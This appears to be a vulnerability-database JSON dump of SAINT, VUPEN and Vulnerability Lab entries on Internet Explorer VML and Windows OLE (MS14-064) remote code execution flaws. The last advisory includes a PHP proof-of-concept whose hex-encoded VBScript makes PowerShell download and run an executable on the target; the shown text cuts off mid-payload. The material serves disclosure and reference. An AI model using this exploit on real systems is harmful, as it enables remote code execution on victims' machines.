"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2021-07-29T16:40:32", "description": "Added: 06/03/2013 \nCVE: [CVE-2013-2551](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551>) \nBID: [58570](<http://www.securityfocus.com/bid/58570>) \nOSVDB: [91197](<http://www.osvdb.org/91197>) \n\n\n### Background\n\n[Vector Markup Language](<http://msdn.microsoft.com/en-us/library/bb250524.aspx>) (VML) is an XML-based format for vector graphics. \n\n### Problem\n\nAn integer overflow vulnerability in `**vml.dll**` when processing `**dashstyle**` attributes of certain VML elements in a web page allows arbitrary command execution. 
\n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 13-037](<http://www.microsoft.com/technet/security/bulletin/ms13-037.mspx>). \n\n### References\n\n<http://secunia.com/advisories/53327/> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8, 9, and 10 with KB2817183 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8, 9 or 10 on the target. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-06-03T00:00:00", "type": "saint", "title": "Internet Explorer VML Dashstyle Attributes Integer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551"], "modified": "2013-06-03T00:00:00", "id": "SAINT:FBD9EA13A5798F1EA68071D436F4A3DE", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_vml_dashstyle_int_overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:30", "description": "Added: 06/03/2013 \nCVE: [CVE-2013-2551](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551>) \nBID: [58570](<http://www.securityfocus.com/bid/58570>) \nOSVDB: [91197](<http://www.osvdb.org/91197>) \n\n\n### Background\n\n[Vector Markup Language](<http://msdn.microsoft.com/en-us/library/bb250524.aspx>) (VML) is an XML-based format for vector graphics. 
\n\n### Problem\n\nAn integer overflow vulnerability in `**vml.dll**` when processing `**dashstyle**` attributes of certain VML elements in a web page allows arbitrary command execution. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 13-037](<http://www.microsoft.com/technet/security/bulletin/ms13-037.mspx>). \n\n### References\n\n<http://secunia.com/advisories/53327/> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8, 9, and 10 with KB2817183 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8, 9 or 10 on the target. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-06-03T00:00:00", "type": "saint", "title": "Internet Explorer VML Dashstyle Attributes Integer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551"], "modified": "2013-06-03T00:00:00", "id": "SAINT:0BF8EDFDFFD4797DCC0B0A0607B187D5", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_vml_dashstyle_int_overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:55", "description": "Added: 06/03/2013 \nCVE: [CVE-2013-2551](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551>) \nBID: [58570](<http://www.securityfocus.com/bid/58570>) \nOSVDB: [91197](<http://www.osvdb.org/91197>) \n\n\n### Background\n\n[Vector Markup 
Language](<http://msdn.microsoft.com/en-us/library/bb250524.aspx>) (VML) is an XML-based format for vector graphics. \n\n### Problem\n\nAn integer overflow vulnerability in `**vml.dll**` when processing `**dashstyle**` attributes of certain VML elements in a web page allows arbitrary command execution. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 13-037](<http://www.microsoft.com/technet/security/bulletin/ms13-037.mspx>). \n\n### References\n\n<http://secunia.com/advisories/53327/> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8, 9, and 10 with KB2817183 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8, 9 or 10 on the target. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-06-03T00:00:00", "type": "saint", "title": "Internet Explorer VML Dashstyle Attributes Integer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2551"], "modified": "2013-06-03T00:00:00", "id": "SAINT:2AEFC3D71E2274B2158FD88B4887ADBF", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_vml_dashstyle_int_overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-01-26T11:36:31", "description": "Added: 06/03/2013 \nCVE: [CVE-2013-2551](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551>) \nBID: [58570](<http://www.securityfocus.com/bid/58570>) \nOSVDB: [91197](<http://www.osvdb.org/91197>) \n\n\n### Background\n\n[Vector Markup Language](<http://msdn.microsoft.com/en-us/library/bb250524.aspx>) (VML) is an XML-based format for vector graphics. \n\n### Problem\n\nAn integer overflow vulnerability in `**vml.dll**` when processing `**dashstyle**` attributes of certain VML elements in a web page allows arbitrary command execution. 
\n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 13-037](<http://www.microsoft.com/technet/security/bulletin/ms13-037.mspx>). \n\n### References\n\n<http://secunia.com/advisories/53327/> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8, 9, and 10 with KB2817183 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8, 9 or 10 on the target. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-06-03T00:00:00", "type": "saint", "title": "Internet Explorer VML Dashstyle Attributes Integer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551"], "modified": "2013-06-03T00:00:00", "id": "SAINT:87287166C5511F458A2B797E5A889BC8", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/ie_vml_dashstyle_int_overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:55", "description": "Added: 11/17/2014 \nCVE: [CVE-2014-6332](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>) \nBID: [70952](<http://www.securityfocus.com/bid/70952>) \nOSVDB: [114533](<http://www.osvdb.org/114533>) \n\n\n### Background\n\n[OLE](<http://www.webopedia.com/TERM/O/OLE.html>) (Object Linking and Embedding) is a technology that allows applications to share data and functionality, such as the ability to create and edit compound data, i.e., data that contains information in multiple 
formats. \n\n### Problem\n\nThe `**SafeArrayRedim**` function in the `**OleAut32.dll**` library does not properly check sizes of arrays when an error occurs. This allows an attacker to manipulate memory and bypass security protections in Internet Explorer, resulting in arbitrary code execution. \n\n### Resolution\n\nApply the security update referenced in [MS14-064](<https://technet.microsoft.com/library/security/MS14-064>). \n\n### References\n\n<https://www.us-cert.gov/ncas/alerts/TA14-318B> \n\n\n### Limitations\n\nExploit works on Windows with Internet Explorer 10 and earlier, and requires a user to load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-11-17T00:00:00", "type": "saint", "title": "Windows OLE Automation Array command execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2014-11-17T00:00:00", "id": "SAINT:C7EDBAF745A12B48814DE43223AAA600", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_ole_automation_array", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:26", "description": "Added: 11/17/2014 \nCVE: [CVE-2014-6332](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>) \nBID: [70952](<http://www.securityfocus.com/bid/70952>) \nOSVDB: [114533](<http://www.osvdb.org/114533>) \n\n\n### Background\n\n[OLE](<http://www.webopedia.com/TERM/O/OLE.html>) (Object Linking and Embedding) is a technology that allows applications to share data and functionality, such as the ability to create and edit compound data, i.e., data that contains information in multiple formats. \n\n### Problem\n\nThe `**SafeArrayRedim**` function in the `**OleAut32.dll**` library does not properly check sizes of arrays when an error occurs. 
This allows an attacker to manipulate memory and bypass security protections in Internet Explorer, resulting in arbitrary code execution. \n\n### Resolution\n\nApply the security update referenced in [MS14-064](<https://technet.microsoft.com/library/security/MS14-064>). \n\n### References\n\n<https://www.us-cert.gov/ncas/alerts/TA14-318B> \n\n\n### Limitations\n\nExploit works on Windows with Internet Explorer 10 and earlier, and requires a user to load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-11-17T00:00:00", "type": "saint", "title": "Windows OLE Automation Array command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2014-11-17T00:00:00", "id": "SAINT:4973412AEB13D8BC398B274492266AEC", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_ole_automation_array", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:25", "description": "Added: 11/17/2014 \nCVE: [CVE-2014-6332](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>) \nBID: [70952](<http://www.securityfocus.com/bid/70952>) \nOSVDB: [114533](<http://www.osvdb.org/114533>) \n\n\n### Background\n\n[OLE](<http://www.webopedia.com/TERM/O/OLE.html>) (Object Linking and Embedding) is a technology that allows applications to share data and functionality, such as the ability to create and edit compound data, i.e., data that contains 
information in multiple formats. \n\n### Problem\n\nThe `**SafeArrayRedim**` function in the `**OleAut32.dll**` library does not properly check sizes of arrays when an error occurs. This allows an attacker to manipulate memory and bypass security protections in Internet Explorer, resulting in arbitrary code execution. \n\n### Resolution\n\nApply the security update referenced in [MS14-064](<https://technet.microsoft.com/library/security/MS14-064>). \n\n### References\n\n<https://www.us-cert.gov/ncas/alerts/TA14-318B> \n\n\n### Limitations\n\nExploit works on Windows with Internet Explorer 10 and earlier, and requires a user to load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-11-17T00:00:00", "type": "saint", "title": "Windows OLE Automation Array command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2014-11-17T00:00:00", "id": "SAINT:B956617792AC597CB312763B7C86DB9C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_ole_automation_array", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:36:41", "description": "Added: 11/17/2014 \nCVE: [CVE-2014-6332](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>) \nBID: [70952](<http://www.securityfocus.com/bid/70952>) \nOSVDB: [114533](<http://www.osvdb.org/114533>) \n\n\n### Background\n\n[OLE](<http://www.webopedia.com/TERM/O/OLE.html>) (Object Linking 
and Embedding) is a technology that allows applications to share data and functionality, such as the ability to create and edit compound data, i.e., data that contains information in multiple formats. \n\n### Problem\n\nThe `**SafeArrayRedim**` function in the `**OleAut32.dll**` library does not properly check sizes of arrays when an error occurs. This allows an attacker to manipulate memory and bypass security protections in Internet Explorer, resulting in arbitrary code execution. \n\n### Resolution\n\nApply the security update referenced in [MS14-064](<https://technet.microsoft.com/library/security/MS14-064>). \n\n### References\n\n<https://www.us-cert.gov/ncas/alerts/TA14-318B> \n\n\n### Limitations\n\nExploit works on Windows with Internet Explorer 10 and earlier, and requires a user to load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-11-17T00:00:00", "type": "saint", "title": "Windows OLE Automation Array command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2014-11-17T00:00:00", "id": "SAINT:A3620300B54852672908F617C4607F00", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/windows_ole_automation_array", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "description": "\r\n\r\nVUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 VML\r\nRemote Integer Overflow 
(MS13-037 / Pwn2Own)\r\n\r\nWebsite : http://www.vupen.com\r\n\r\nTwitter : http://twitter.com/vupen\r\n\r\n\r\nI. BACKGROUND\r\n---------------------\r\n\r\n"Microsoft Internet Explorer is a web browser developed by Microsoft and\r\nincluded as part of the Microsoft Windows line of operating systems with\r\nmore than 60% of the worldwide usage share of web browsers." (Wikipedia)\r\n\r\n\r\nII. DESCRIPTION\r\n---------------------\r\n\r\nVUPEN Vulnerability Research Team discovered a critical vulnerability\r\nin Microsoft Internet Explorer.\r\n\r\nThe vulnerability is caused by an integer overflow error in the "vml.dll"\r\ncomponent when processing certain undocumented vector graphic properties,\r\nwhich could be exploited by remote attackers to leak arbitrary memory and\r\ncompromise a vulnerable system via a malicious web page.\r\n\r\nCVE: CVE-2013-2551\r\n\r\n\r\nIII. AFFECTED PRODUCTS\r\n---------------------------\r\n\r\nMicrosoft Internet Explorer 10\r\nMicrosoft Internet Explorer 9\r\nMicrosoft Internet Explorer 8\r\nMicrosoft Internet Explorer 7\r\nMicrosoft Internet Explorer 6\r\n\r\nMicrosoft Windows RT\r\nMicrosoft Windows 8 for 32-bit Systems\r\nMicrosoft Windows 8 for x64-based Systems\r\nMicrosoft Windows Server 2012\r\nMicrosoft Windows 7 for 32-bit Systems\r\nMicrosoft Windows 7 for 32-bit Systems Service Pack 1\r\nMicrosoft Windows 7 for x64-based Systems\r\nMicrosoft Windows 7 for x64-based Systems Service Pack 1\r\nMicrosoft Windows Server 2008 for 32-bit Systems\r\nMicrosoft Windows Server 2008 for 32-bit Systems Service Pack 2\r\nMicrosoft Windows Server 2008 for x64-based Systems\r\nMicrosoft Windows Server 2008 for x64-based Systems Service Pack 2\r\nMicrosoft Windows Server 2008 for Itanium-based Systems\r\nMicrosoft Windows Server 2008 for Itanium-based Systems Service Pack 2\r\nMicrosoft Windows Server 2008 R2 for x64-based Systems\r\nMicrosoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\r\nMicrosoft Windows Server 2008 R2 
for Itanium-based Systems\r\nMicrosoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1\r\nMicrosoft Windows Vista Service Pack 1\r\nMicrosoft Windows Vista Service Pack 2\r\nMicrosoft Windows Vista x64 Edition Service Pack 1\r\nMicrosoft Windows Vista x64 Edition Service Pack 2\r\nMicrosoft Windows Server 2003 Service Pack 2\r\nMicrosoft Windows Server 2003 x64 Edition Service Pack 2\r\nMicrosoft Windows Server 2003 with SP2 for Itanium-based Systems\r\nMicrosoft Windows XP Service Pack 3\r\nMicrosoft Windows XP Professional x64 Edition Service Pack 2\r\n\r\n\r\nIV. Binary Analysis & Exploits/PoCs\r\n---------------------------------------\r\n\r\nIn-depth technical analysis of the vulnerability and a fully functional\r\nremote code execution exploit will be available through the VUPEN BAE\r\n(Binary Analysis & Exploits) portal:\r\n\r\nhttp://www.vupen.com/english/services/ba-index.php\r\n\r\nVUPEN Binary Analysis & Exploits Service provides private exploits and\r\nin-depth technical analysis of the most significant public vulnerabilities\r\nbased on disassembly, reverse engineering, protocol analysis, and code\r\naudit.\r\n\r\nThe service allows governments and major corporations to evaluate risks, and\r\nprotect infrastructures and assets against new threats. The service also\r\nallows security vendors (IPS, IDS, AntiVirus) to supplement their internal\r\nresearch efforts and quickly develop both vulnerability-based and\r\nexploit-based signatures to proactively protect their customers from attacks\r\nand emerging threats.\r\n\r\n\r\nV. 
VUPEN Threat Protection Program\r\n-----------------------------------\r\n\r\nGovernments and major corporations which are members of the VUPEN Threat\r\nProtection Program (TPP) have been proactively alerted about the\r\nvulnerability\r\nwhen it was discovered by VUPEN in advance of its public disclosure, and\r\nhave received a detailed attack detection guidance to protect national and\r\ncritical infrastructures against potential 0-day attacks exploiting this\r\nvulnerability:\r\n\r\nhttp://www.vupen.com/english/services/tpp-index.php\r\n\r\n\r\nVI. SOLUTION\r\n----------------\r\n\r\nApply MS13-037 security updates.\r\n\r\n\r\nVII. CREDIT\r\n--------------\r\n\r\nThis vulnerability was discovered by Nicolas Joly of VUPEN Security\r\n\r\n\r\nVIII. ABOUT VUPEN Security\r\n---------------------------\r\n\r\nVUPEN is the leading provider of defensive and offensive cybersecurity\r\nintelligence and advanced vulnerability research. VUPEN solutions enable\r\ncorporations and governments to manage risks, and protect critical networks\r\nand infrastructures against known and unknown vulnerabilities.\r\n\r\nVUPEN solutions include:\r\n\r\n* VUPEN Binary Analysis & Exploits Service (BAE) :\r\nhttp://www.vupen.com/english/services/ba-index.php\r\n\r\n* VUPEN Threat Protection Program (TPP) :\r\nhttp://www.vupen.com/english/services/tpp-index.php\r\n\r\n\r\nIX. REFERENCES\r\n----------------------\r\n\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms13-037\r\nhttp://www.vupen.com/english/research.php\r\n\r\n\r\nX. 
DISCLOSURE TIMELINE\r\n-----------------------------\r\n\r\n2011-11-09 - Vulnerability Discovered by VUPEN\r\n2013-03-06 - Vulnerability Reported to Microsoft During Pwn2Own 2013\r\n2013-05-20 - Public disclosure\r\n", "edition": 1, "cvss3": {}, "published": "2013-05-27T00:00:00", "title": "VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 VML Remote Integer Overflow (MS13-037 / Pwn2Own)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-2551"], "modified": "2013-05-27T00:00:00", "id": "SECURITYVULNS:DOC:29424", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29424", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:01", "description": "\r\n\r\nDocument Title:\r\n===============\r\nMicrosoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064)\r\n\r\n\r\nReferences (Source):\r\n====================\r\nhttp://www.vulnerability-lab.com/get_content.php?id=1576\r\n\r\nVideo: http://youtu.be/Vkswz7vt23M\r\n\r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6332\r\n\r\nCVE-ID:\r\n=======\r\nCVE-2014-6332\r\n\r\n\r\nRelease Date:\r\n=============\r\n2015-08-15\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1576\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n9.3\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe Vulnerability Laboratory discovered remote code execution vulnerability in the Microsoft HTA (HTML Application) - MS14-064.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2015-08-15:\tPublic Disclosure (Vulnerability Laboratory)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity 
Level:\r\n===============\r\nHigh\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nOleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, \r\nWindows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by \r\nan array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka Windows OLE Automation \r\nArray Remote Code Execution Vulnerability.\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe vulnerbility can be exploited by remote attackers without user interaction or privilege application user accounts. \r\nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.\r\n\r\nManual steps to reproduce ...\r\n1 . Run php code : php hta.php\r\n2 . Copy this php output (HTML) and Paste as poc.hta (Replace ip)\r\n3 . Open poc.hta\r\n4 . Your Link Download/Execute on your target\r\n5 . Finished \r\n\r\n#!/usr/bin/php\r\n<?php\r\n # Title : Microsoft Windows HTA (HTML Application) - Remote Code Execution\r\n # Tested on Windows 7 / Server 2008\r\n #\r\n #\r\n # Author : Mohammad Reza Espargham\r\n # Linkedin : https://ir.linkedin.com/in/rezasp\r\n # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com\r\n # Website : www.reza.es\r\n # Twitter : https://twitter.com/rezesp\r\n # FaceBook : https://www.facebook.com/mohammadreza.espargham\r\n #\r\n #\r\n # MS14-064\r\n #\r\n #\r\n # 1 . run php code : php hta.php\r\n # 2 . copy this php output (HTML) and Paste as poc.hta (Replace ip)\r\n # 3 . open poc.hta\r\n # 4 . Your Link Download/Execute on your target\r\n # 5 . 
Finished \r\n #\r\n # Demo : http://youtu.be/Vkswz7vt23M\r\n #\r\n \r\n \r\n \r\n \r\n $port=80; # Port Address\r\n $link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your exe link\r\n \r\n \r\n \r\n print " Mohammad Reza Espargham\n\n\n";\r\n \r\n $host= gethostname(); #g3th0stn4m3\r\n $ip = gethostbyname($host); #g3th0stbyn4m3\r\n \r\n print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . '"></head></html>'."\n\n";\r\n \r\n $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');\r\n socket_bind($reza, 0,$port);\r\n socket_listen($reza);\r\n \r\n $msgd =\r\n "\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76".\r\n "\x3d\x22\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x22\x20\x63\x6f\x6e\x74\x65".\r\n "\x6e\x74\x3d\x22\x49\x45\x3d\x45\x6d\x75\x6c\x61\x74\x65\x49\x45\x38\x22\x20\x3e\x0d\x0a\x3c\x68".\r\n "\x65\x61\x64\x3e\x0d\x0a\x3c\x2f\x68\x65\x61\x64\x3e\x0d\x0a\x3c\x62\x6f\x64\x79\x3e\x0d\x0a\x20".\r\n "\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47\x45\x3d\x22\x56\x42\x53\x63".\r\n "\x72\x69\x70\x74\x22\x3e\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6e\x6d\x75".\r\n "\x6d\x61\x61\x28\x29\x20\x0d\x0a\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20".\r\n "\x4e\x65\x78\x74\x0d\x0a\x73\x65\x74\x20\x73\x68\x65\x6c\x6c\x3d\x63\x72\x65\x61\x74\x65\x6f\x62".\r\n "\x6a\x65\x63\x74\x28\x22\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22".\r\n "\x29\x0d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x3d\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x45\x78\x70\x72\x65".\r\n "\x73\x73\x69\x6f\x6e\x20\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x53\x79\x73\x74\x65".\r\n "\x6d\x2e\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61".\r\n 
"\x64\x46\x69\x6c\x65\x28\x27\x46\x49\x4c\x45\x5f\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x27\x2c\x27\x6c".\r\n "\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x2d".\r\n "\x63\x6f\x6d\x20\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x29\x2e\x53".\r\n "\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6c\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b".\r\n "\x22\x0d\x0a\x73\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70".\r\n "\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x2e\x65\x78\x65\x22\x2c\x20\x22\x2d\x43\x6f\x6d\x6d\x61\x6e".\r\n "\x64\x20\x22\x20\x26\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x22\x22\x2c\x20\x22\x72\x75\x6e\x61".\r\n "\x73\x22\x2c\x20\x30\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x3c\x2f\x73".\r\n "\x63\x72\x69\x70\x74\x3e\x0d\x0a\x20\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55".\r\n "\x41\x47\x45\x3d\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x20\x20\x0d\x0a\x64\x69\x6d".\r\n "\x20\x20\x20\x61\x61\x28\x29\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x29\x0d\x0a\x64\x69\x6d".\r\n "\x20\x20\x20\x61\x30\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x31\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61".\r\n "\x32\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x33\x0d\x0a\x64\x69\x6d\x20\x20\x20\x77\x69\x6e\x39\x78".\r\n "\x0d\x0a\x64\x69\x6d\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x0d\x0a\x64\x69\x6d\x20".\r\n "\x20\x20\x72\x6e\x64\x61\x0d\x0a\x64\x69\x6d\x20\x20\x20\x66\x75\x6e\x63\x6c\x61\x73\x73\x0d\x0a".\r\n 